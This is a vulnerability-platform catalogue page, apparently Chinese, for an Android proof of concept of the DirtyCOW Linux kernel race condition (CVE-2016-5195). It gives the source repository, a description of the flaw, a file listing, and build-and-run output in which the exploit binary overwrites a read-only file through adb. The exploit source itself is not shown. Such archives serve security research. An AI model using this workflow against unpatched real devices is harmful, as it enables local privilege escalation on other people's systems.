漏洞平台

POC详情： d4cd48bf5abaff57cb032986896d38f7d3ad49d8

来源

https://github.com/DanielEbert/CVE-2016-5195

关联漏洞

标题： Linux kernel 竞争条件问题漏洞 (CVE-2016-5195)
描述：Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel 2.x至4.8.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞，该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用该漏洞获取权限。

描述

DirtyCOW Exploit for Android

介绍

# demo1

This demo is based on https://github.com/timwr/CVE-2016-5195

make test output:
```
user@user:/$ cd /home/user/demo1 && make test
/home/user/adb/android-ndk-r21d/ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=x86_64 APP_PLATFORM=android-23
make[1]: Entering directory '/home/user/demo1'
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
make[1]: Leaving directory '/home/user/demo1'
adb push libs/x86_64/dirtycow /data/local/tmp/dcow
libs/x86_64/dirtycow: 1 file pushed. 8.8 MB/s (10408 bytes in 0.001s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push test.sh /data/local/tmp/test.sh
test.sh: 1 file pushed. 0.5 MB/s (367 bytes in 0.001s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/test.sh'
adb shell '/data/local/tmp/test.sh'
-rw-rw-rw- shell    shell          18 2020-12-29 23:01 test
-rwxrwxrwx shell    shell         367 2020-12-29 18:24 test.sh
-r--r--r-- shell    shell          18 2020-12-29 23:01 test2
adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
dcow /data/local/tmp/test /data/local/tmp/test2
[*] size 18
[*] mmap 0x7ff91dc4f000
[*] currently 0x7ff91dc4f000=76746f6e72756f79
[*] using /proc/self/mem method
[*] madvise = 0x7ff91dc4f000 18
[*] madvise = 0 5082
[*] /proc/self/mem 1431270 79515
[*] exploited 0 0x7ff91dc4f000=626172656e6c7576
adb shell 'cat /data/local/tmp/test2'
vulnerable!!!!!!!
adb shell 'cat /data/local/tmp/test2' | xxd
00000000: 7675 6c6e 6572 6162 6c65 2121 2121 2121  vulnerable!!!!!!
00000010: 210d 0a
```

文件快照


 [4.0K]  /data/pocs/d4cd48bf5abaff57cb032986896d38f7d3ad49d8
├── [ 346]  Android.mk
├── [5.2K]  dcow.c
├── [ 990]  Makefile
├── [1.6K]  README.md
├── [1.1K]  run-as.c
└── [ 360]  test.sh

0 directories, 6 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。